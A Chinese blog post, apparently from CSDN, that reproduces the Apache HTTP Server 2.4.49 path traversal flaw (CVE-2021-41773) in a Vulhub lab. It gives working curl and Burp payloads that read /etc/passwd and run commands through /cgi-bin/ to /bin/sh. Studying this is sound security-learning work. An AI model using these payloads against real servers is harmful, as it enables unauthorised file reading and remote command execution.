【漏洞复现】Apache_HTTP_2.4.49_路径穿越漏洞(CVE-2021-41773)

最新推荐文章于 2024-09-17 16:55:06 发布
最新推荐文章于 2024-09-17 16:55:06 发布
阅读量773 收藏
点赞数
分类专栏: # 漏洞复现 文章标签: apache http 网络协议 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/134221186
版权

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明内容
漏洞编号CVE-2021-41773
漏洞名称Apache HTTP 路径穿越漏洞
漏洞评级高危
影响范围2.4.49
漏洞描述在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件
修复方案

1.1、漏洞描述

Apache HTTP服务器项目致力于为现代操作系统(包括UNIX和Windows)开发和维护开源HTTP服务器。

在Apache HTTP Server 2.4.49中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将URL映射到预期文档根目录之外的文件。

如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功。如果CGI脚本也为这些别名路径启用,则可以允许远程代码执行。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49

1.4、漏洞复现

1、基础环境

Path:Vulhub/httpd/CVE-2021-41773

启动测试环境:

sudo docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到

在这里插入图片描述

2、漏洞验证
方式一 curl

/icons/必须是现有目录

curl -v --path-as-is http://192.168.80.141:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

在服务器上启用mods cgicgid后,此路径遍历漏洞将允许执行任意命令

curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh'

在这里插入图片描述

方式二 bp抓包
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

在这里插入图片描述

/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
echo;id

在这里插入图片描述

过期的秋刀鱼-
关注
专栏目录
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
Apache HTTP Server 2.4.49 路径穿越漏洞复现及利用
Tauil的博客
07-23 3237
ApacheHTTPServer是Apache基金会开源的一款流行的HTTP服务器。版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。.....................
Apache 2.4.49 路径穿越漏洞复现 ( CVE-2021-41773 )
qq_45396375的博客
01-04 614
Apache HTTP Server 2.4.49版本中存在一处路径穿越漏洞CVE-2021-41773)如果配置了Require all granted,远程攻击者可以使用路径遍历攻击访问易受攻击的Web服务器上文档根目录以外的任意文件;如果Apache HTTP Server 2.4.49开启了CGI,攻击者还可构造恶意请求实现远程代码执行。
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Apache Pulsar 与 Kafka Streams
Flying_Fish_roe的博客
09-12 890
是一个由 Apache Software Foundation 开源的分布式消息流平台,提供多租户、高性能的发布-订阅消息系统。Pulsar 主要用于实时数据的传输和消息队列处理,它支持水平扩展、数据持久化、多租户、消息存储分层以及跨地域复制等特性。是 Apache Kafka 提供的一个用于构建实时数据流处理应用的流处理库。Kafka Streams 使开发者能够轻松构建具备高可扩展性和容错能力的数据处理应用,无需借助额外的处理引擎或框架。
利用apache-pdfbox库修改pdf文件模板,进行信息替换
向技术大牛致敬
09-13 536
该板块主要用于利用模板生成入驻企业的合同信息,便于在线发起合同签署功能。采用了模板的变量替换方式,需要将变量信息预先插入到模板的指定位置。
[苍穹外卖]-12Apache POI入门与实战
CSDN20221005的博客
09-16 535
Apache POI是一个处理Office各种文件格式的开源项目, 我们可以使用POI在java程序中对Office的各种文件进行读写操作, 一般情况下, POI都是用于读写Excel文件。设计Excel模版文件, 以简化代码, 降低编码难度, 模版文件放在resources/template/运行数据报表模版.xlsx。接口设计: 该接口无需返回数据, 报表导出功能本质是文件下载, 服务端通过输出流将Excel文件下载到客户端浏览器即可。快速入门: 引入坐标, 编写测试方法, 写入和读取Excel文件。
网络安全-利用 Apache Mod CGI
最新发布
m0_68976043的博客
09-17 137
蚁剑官网拉取。
systemctl控制服务和守护进程
zdd56789的博客
09-17 486
systemctl控制服务和守护进程
Apache-wed服务器环境的安装
2301_78530830的博客
09-13 506
vim /etc/httpd/conf/httpd.conf (修改httpd.conf默认配置文件)vim /etc/named.rfc1912.zones(进入该目录,追加以下内容)4.重启服务:systemctl restart httpd。vim index.html(创建xiaoming的网页)vim index.html(里面写入自己的内容)1.创建用户并且修改加用户目录权限。创建并修改区域配置文件。3.修改用户主页配置文件。6.修改本地DNS指向。拓展:添加DNS域名。
Apache SeaTunnel Committer 进阶指南
weixin_54625990的博客
09-13 1147
Apache SeaTunnel 作为一个开源的数据集成工具,旨在简化和加速海量数据的采集和传输。社区的 Committer 是指拥有项目存储库的写权限的社区成员,即 Committer 可以自行修改代码、文档和网站,也可以合并其他成员的贡献。成为 Apache SeaTunnel Committer 没有严格的规则,实际上,新 Committer 的候选人通常是活跃的贡献者和社区成员。
apache文件共享和访问控制
Valder__的博客
09-13 426
也可以查看里面的文件,但因为shadow没有可读权限,可以为他添加权限后查看。在配置文件中编辑黑名单,指出被禁用的IP。在此路径创建文件夹,并复制点内容。打开客户端输入IP查看网页内容。
查询性能提升 10 倍、存储空间节省 65%,Apache Doris 半结构化数据分析方案及典型场景
SelectDB
09-13 1167
随着业务的蓬勃发展,各企业对数据处理的灵活性和可扩展性提出了更高的要求。在此背景下,JSON、XML 等半结构化数据凭借其较强的灵活性在众多企业得到广泛应用。然而,传统关系型数据库结构严格,难以应对半结构化数据的复杂性及多样性。本文我们将聚焦企业最普遍使用的 JSON 数据,分别介绍业界传统方案以及半结构化数据存储分析的三种方案,并通过图表直观展示这些方案的优势与不足。同时,结合具体应用场景,分享不同需求场景下的使用方式,帮助用户快速选择最合适的 JSON 数据存储及分析方案。
在线小说|基于java的小说阅读系统小程序(源码+数据库+文档)
伟庭的博客
09-13 1496
因此市面上各种阅读类应用的用户体验参差不齐,所以设计一个通用的阅读器,小说阅读器小程序采用java开发语言、以及Mysql数据库等技术。系统主要分为管理员和用户二部分,管理员服务端:首页、个人中心、用户管理、小说分类管理、书城管理、订单信息管理、小说资讯管理、小说章节管理、书圈、系统管理,用户客户端;首页、书城、小说资讯、书圈、我的等功能,基本上实现了整个小说阅读器小程序信息管理的过程。
Apache POI 学习
weixin_42564451的博客
09-14 887
Apache POI 是一个功能强大的 Java 库,用于处理 Microsoft Office 文件。Apache POI 官方文档。
Nginx搭建直播服务器,并用rtmp,http-flv,hls三种模式拉流观看直播的流程
桃花岛主的博客
09-17 313
是指推流的目录在live,hls on是指开启切片,hls_path: html/hls是指切片直播的目录,手动创建,hls_fragment:3,每3秒创建一个切片。我们这个nginx推流服务器的http地址是:http://localhost:8080。环境widows,并且已经集成了 :nginx-http-flv-module模块。注意是两个nginx,一个是8080,负责直播推流,80的负责播放。1、vlc播放:(有以下三种播放方式:)我们再开一个nginx,端口为:80,这样就播放出来了视频。
cve-2021-41773漏洞复现
06-28
cve-2021-41773漏洞Apache HTTP Server中的一个安全漏洞,攻击者可以利用该漏洞在未经授权的情况下访问服务器上的文件。 要复现漏洞,可以按照以下步骤进行: 1. 安装Apache HTTP Server,并确保其版本为2.4....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值